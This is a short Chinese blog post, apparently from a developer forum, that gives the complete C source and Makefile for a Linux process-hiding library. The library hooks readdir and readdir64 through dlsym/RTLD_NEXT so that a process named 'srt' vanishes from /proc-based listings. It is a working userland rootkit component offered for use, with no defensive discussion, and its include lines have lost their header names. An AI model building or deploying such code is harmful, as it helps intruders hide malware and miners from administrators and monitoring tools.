本文介绍了一个简单的进程隐藏技术实现方案,通过修改readir函数的行为来过滤指定名称的进程,使其在进程列表中不可见。该方案适用于Linux环境,并提供了完整的源代码及编译指令。
2、源码如下
root@ubuntu:/var/srt/libprocesshider# cat processhider.c
#define _GNU_SOURCE
#include
#include
#include
#include
#include
/*
* Every process with this name will be excluded
*/
static const char* process_to_filter = "srt";
/*
* Get a directory name given a DIR* handle
*/
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
int fd = dirfd(dirp);
if(fd == -1) {
return 0;
}
char tmp[64];
snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
ssize_t ret = readlink(tmp, buf, size);
if(ret == -1) {
return 0;
}
buf[ret] = 0;
return 1;
}
/*
* Get a process name given its pid
*/
static int get_process_name(char* pid, char* buf)
{
if(strspn(pid, "0123456789") != strlen(pid)) {
return 0;
}
char tmp[256];
snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
FILE* f = fopen(tmp, "r");
if(f == NULL) {
return 0;
}
if(fgets(tmp, sizeof(tmp), f) == NULL) {
fclose(f);
return 0;
}
fclose(f);
int unused;
sscanf(tmp, "%d (%[^)]s", &unused, buf);
return 1;
}
#define DECLARE_READDIR(dirent, readdir) \
static struct dirent* (*original_##readdir)(DIR*) = NULL; \
\
struct dirent* readdir(DIR *dirp) \
{ \
if(original_##readdir == NULL) { \
original_##readdir = dlsym(RTLD_NEXT, #readdir); \
if(original_##readdir == NULL) \
{ \
fprintf(stderr, "Error in dlsym: %s\n", dlerror()); \
} \
} \
\
struct dirent* dir; \
\
while(1) \
{ \
dir = original_##readdir(dirp); \
if(dir) { \
char dir_name[256]; \
char process_name[256]; \
if(get_dir_name(dirp, dir_name, sizeof(dir_name)) && \
strcmp(dir_name, "/proc") == 0 && \
get_process_name(dir->d_name, process_name) && \
strcmp(process_name, process_to_filter) == 0) { \
continue; \
} \
} \
break; \
} \
return dir; \
}
DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
root@ubuntu:/var/srt/libprocesshider#
root@ubuntu:/var/srt/libprocesshider# cat Makefile
all: libprocesshider.so
libprocesshider.so: processhider.c
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
.PHONY clean:
rm -f libprocesshider.so
root@ubuntu:/var/srt/libprocesshider#
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
